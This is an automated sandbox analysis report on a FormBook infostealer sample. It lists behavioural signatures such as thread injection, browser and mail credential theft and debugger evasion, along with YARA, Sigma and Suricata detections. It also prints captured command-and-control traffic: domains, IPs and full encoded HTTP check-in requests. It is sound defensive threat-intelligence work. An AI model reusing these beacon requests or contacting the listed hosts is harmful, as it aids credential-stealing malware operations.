Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
VSP469620.exe

Overview

General Information

Sample name:VSP469620.exe
Analysis ID:1561727
MD5:e4cb2ac542d27b0c73c5a290bf5ffe77
SHA1:0340de260b7364564c4c3480b0489d4edf431a3e
SHA256:9060815773bcc67db557cd691aeb3c74d471008e7c9388d13c7b03468b11dcfe
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • VSP469620.exe (PID: 7980 cmdline: "C:\Users\user\Desktop\VSP469620.exe" MD5: E4CB2AC542D27B0C73C5A290BF5FFE77)
    • svchost.exe (PID: 8060 cmdline: "C:\Users\user\Desktop\VSP469620.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • VgGNmkZfWSSE.exe (PID: 3300 cmdline: "C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • icsunattend.exe (PID: 744 cmdline: "C:\Windows\SysWOW64\icsunattend.exe" MD5: 6D01FCE30EF8A2CA0D385593E90879E5)
          • VgGNmkZfWSSE.exe (PID: 6048 cmdline: "C:\Program Files (x86)\dAjQDdCpNwLhjCqxIqvaEamXnqFgTeAHuYvHbyKYDFpIkktk\VgGNmkZfWSSE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1516 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            4.2.svchost.exe.6d0000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              4.2.svchost.exe.6d0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\VSP469620.exe", CommandLine: "C:\Users\user\Desktop\VSP469620.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ParentImage: C:\Users\user\Desktop\VSP469620.exe, ParentProcessId: 7980, ParentProcessName: VSP469620.exe, ProcessCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ProcessId: 8060, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\VSP469620.exe", CommandLine: "C:\Users\user\Desktop\VSP469620.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ParentImage: C:\Users\user\Desktop\VSP469620.exe, ParentProcessId: 7980, ParentProcessName: VSP469620.exe, ProcessCommandLine: "C:\Users\user\Desktop\VSP469620.exe", ProcessId: 8060, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-24T08:13:48.549892+010020507451Malware Command and Control Activity Detected192.168.2.1049853172.104.82.7480TCP
                2024-11-24T08:14:09.110171+010020507451Malware Command and Control Activity Detected192.168.2.104990431.31.196.17780TCP
                2024-11-24T08:14:24.686321+010020507451Malware Command and Control Activity Detected192.168.2.104994313.248.169.4880TCP
                2024-11-24T08:14:39.454457+010020507451Malware Command and Control Activity Detected192.168.2.104998013.248.169.4880TCP
                2024-11-24T08:14:55.212395+010020507451Malware Command and Control Activity Detected192.168.2.1049990107.167.84.4280TCP
                2024-11-24T08:15:10.273169+010020507451Malware Command and Control Activity Detected192.168.2.1049994209.74.77.10880TCP
                2024-11-24T08:15:24.991140+010020507451Malware Command and Control Activity Detected192.168.2.1049998104.21.44.1680TCP
                2024-11-24T08:15:39.670779+010020507451Malware Command and Control Activity Detected192.168.2.105000213.248.169.4880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: VSP469620.exeReversingLabs: Detection: 63%
                Source: VSP469620.exeVirustotal: Detection: 64%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.svchost.exe.6d0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3143475754.0000000001160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818834622.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143800375.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1818515426.00000000006D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3141775321.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.1819214372.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3144417314.0000000004490000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3143584340.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: VSP469620.exeJoe Sandbox ML: detected
                Source: VSP469620.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: VgGNmkZfWSSE.exe, 00000006.00000000.1738250337.000000000074E000.00000002.00000001.01000000.00000005.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000002.3141773631.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: VSP469620.exe, 00000002.00000003.1302642095.00000000038E0000.00000004.00001000.00020000.00000000.sdmp, VSP469620.exe, 00000002.00000003.1300070020.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000004.00000003.1717413410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000003.1715037623.0000000000D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818888333.000000000339E000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, icsunattend.exe, 00000007.00000003.1818867931.00000000041BD000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000003.1821159790.0000000004369000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3144448252.0000000004510000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdbGCTL source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: icsunattend.pdb source: svchost.exe, 00000004.00000002.1818680712.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.1818663703.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, VgGNmkZfWSSE.exe, 00000006.00000002.3143693434.0000000000AF7000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: icsunattend.exe, 00000007.00000002.3142248419.0000000002856000.00000004.00000020.00020000.00000000.sdmp, icsunattend.exe, 00000007.00000002.3145271641.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, VgGNmkZfWSSE.exe, 0000000A.00000000.1887577336.0000000002CDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2115971735.0000000026E9C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF6CA9 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00AF6CA9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00AF60DD
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AF63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00AF63F9
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00AFEB60
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00AFF5FA
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00AFF56F FindFirstFileW,FindClose,2_2_00AFF56F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01B2F
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00B01C8A
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B01F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00B01F94
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 7_2_0036C730 FindFirstFileW,FindNextFileW,FindClose,7_2_0036C730
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 4x nop then xor eax, eax7_2_00359F20
                Source: C:\Windows\SysWOW64\icsunattend.exeCode function: 4x nop then mov ebx, 00000004h7_2_043604D8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49853 -> 172.104.82.74:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49904 -> 31.31.196.177:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49943 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49980 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49994 -> 209.74.77.108:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49998 -> 104.21.44.16:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49990 -> 107.167.84.42:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:50002 -> 13.248.169.48:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.aktmarket.xyz
                Source: DNS query: www.heliopsis.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\VSP469620.exeCode function: 2_2_00B04EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,2_2_00B04EB5
                Source: global trafficHTTP traffic detected: GET /2dyu/?9HaD=bADo+7fqvlD2EEl6eQvhi6r6MxrwZqr7unPyaN6ymuSYop7wnq2+HbU7S+lsr3BB8s+/OWm3f+6bBn12YfZxgjGy6pWaqu2XlCfxhX0HPUcroLTQDQ==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.funnystory.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /9ul0/?9HaD=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeT5OVDDglLmzebYBZGko1gl0UlPxFA==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.nartex-uf.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /4mbo/?9HaD=TaoaspSuXCWG+J6Qu2ekK1wrjY2r/s8nGO1Ev0B6QwWm63/Js3V07H2UbHrGJNHujJI3HhKgRchyd4beF5Q/e7/FZQPmwnmSAvyJ8G6Q9CuC8rAD3Q==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /5cnx/?9HaD=oUaJUx3W91XKGFwkbiDYgYplg4TZBQwbgtCkXvgonjE8SHvx+U3TNstQnLVJ8Y9FFWXzakAfwSz/u1Ky3cg6+DtwGVYcLfdFQx5ESoBa74WqNsm9mQ==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.a1shop.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /bw18/?9HaD=shKGC8bK6vrLacDTgBZk6Rr0hJ1HgilraKgFYlsRqeuAlXFl2di5oGGCrfCVn8Xiw6EWTnMqBe6emh6gDO/8taYQfWAt8ESD/mKf9DNdyFPR+ujYTQ==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.cssa.auctionConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.urbanxplore.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /stfe/?wdv4=1RD4&9HaD=ORqY22CcDufF1m336sq5Rb7ktLrp91WB7UJGYn2fYGIkb40HC4QAI0Uo1DAA/E2P6coBVsarHDRzXgtbaXIBPtY5QkEUWLhgXwOO0YSIlO9ptKaJ+w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.3kw40881107247y.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficHTTP traffic detected: GET /cclj/?9HaD=8+p9jI+W8p4gGfkrJ06IbG7GVrDrFE39Gbevi7MMoG/mxV0OJ3bBQ6ZfzHGiIebJDzxdJU835govK3Wq3/2OXcUb6pzjLf8wiqFw/QHcYMK4syzjiA==&wdv4=1RD4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.heliopsis.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                Source: global trafficDNS traffic detected: DNS query: www.funnystory.online
                Source: global trafficDNS traffic detected: DNS query: www.nartex-uf.online
                Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                Source: global trafficDNS traffic detected: DNS query: www.a1shop.shop
                Source: global trafficDNS traffic detected: DNS query: www.cssa.auction
                Source: global trafficDNS traffic detected: DNS query: www.urbanxplore.info
                Source: global trafficDNS traffic detected: DNS query: www.3kw40881107247y.click
                Source: global trafficDNS traffic detected: DNS query: www.heliopsis.xyz
                Source: global trafficDNS traffic detected: DNS query: www.mdpc7.top
                Source: unknownHTTP traffic detected: POST /9ul0/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.5Host: www.nartex-uf.onlineOrigin: http://www.nartex-uf.onlineReferer: http://www.nartex-uf.online/9ul0/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 193Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)Data Raw: 39 48 61 44 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 79 36 4f 63 6a 6a 54 68 4e 46 66 53 4c 6a 2f 79 70 51 33 33 52 7a 68 65 4f 42 45 65 77 61 72 61 41 43 64 41 55 31 52 42 65 56 49 6b 56 5a 6a 65 73 4f 35 32 37 68 6b 4e 72 77 6a 7a 65 6c 68 72 6e 75 30 38 67 43 6b 4e 63 79 63 45 4b 53 47 66 31 4c 44 2f 41 35 55 43 5a 58 6b 47 31 53 6f 4a 4d 53 33 61 57 45 4f 47 73 6b 78 6f 76 61 56 71 59 44 74 33 57 42 44 77 6b 65 4c 48 35 6c 43 30 43 31 6b 66 67 41 33 43 77 2b 4f 50 72 47 47 45 70 54 4f 74 75 4c 6f 53 6d 70 68 71 52 30 4a 64 6b 32 6e 70 6f 71 58 59 39 52 64 6c 61 4c 31 69 Data Ascii: 9HaD=y+M8hlRgYnlcy6OcjjThNFfSLj/ypQ33RzheOBEewaraACdAU1RBeVIkVZjesO527hkNrwjzelhrnu08gCkNcycEKSGf1LD/A5UCZXkG1SoJMS3aWEOGskxovaVqYDt3WBDwkeLH5lC0C1kfgA3Cw+OPrGGEpTOtuLoSmphqR0Jdk2npoqXY9RdlaL1i
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:14:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 ad f0 c6 0f ee 6d b3 b3 32 e7 96 a1 77 0d db ee be 3d fb e6 e4 9b cf fd ef e4 9b 7f 7c d5 e9 20 1d 9d 99 ef 77 f8 33 c7 9d 9b 57 2b 77 be b1 4d ff 0c 6e 0d 6c d7 98 9b de 19 61 1f ff 9b 7f 7e 3e b3 5d c7 9c ff 15 0a bc 37 83 81 c6 6f 7c f3 42 bc 3c c9 55 5d 83 10 a4 aa fb de 2c 06 91 2f 0a ff e2 72 73 cb 0f ce 66 bf f9 b4 d8 b5 b9 3a bb b6 dd d9 07 9f 8f 04 f0 ec 1a 84 ef 26 fa e2 b1 6e 07 e9 00 2a fe f1 dc cc 6c fd 77 f6 15 4f e9 7a 00 3e ac 6d e3 7e b2 b0 cd 8f 53 fc 18 cc 2d cf 9c 05 96 eb 4c 66 ae bd 59 39 53 32 0c 26 a2 20 7c 3d 5d 59 0e 1d 15 13 59 12 d6 1f a7 4b d3 ba 59 06 f4 d9 da 98 cf 61 34 4e d4 e1 fa 63 47 e8 08 d3 95 e1 dd 58 ce 44 98 02 1c d7 9b fc 8b ac 29 f0 ff 74 01 43 65 22 4a 50 e8 47 18 33 1e f7 ad 07 a3 8b fb c1 b4 6f cd c0 9a 19 9d 9f cc 8d 99 fc e4 be f7 4c f3 bd e1 f8 9c 0f 1f 03 18 fc d6 62 7a 6d cc 3e dc 78 ee c6 99 4f fe 65 b1 58 4c 07 77 e6 f5 07 2b 18 04 c6 7a b0 84 16 d9 d8 aa 01 45 1b 78 50 6f 6d 78 30 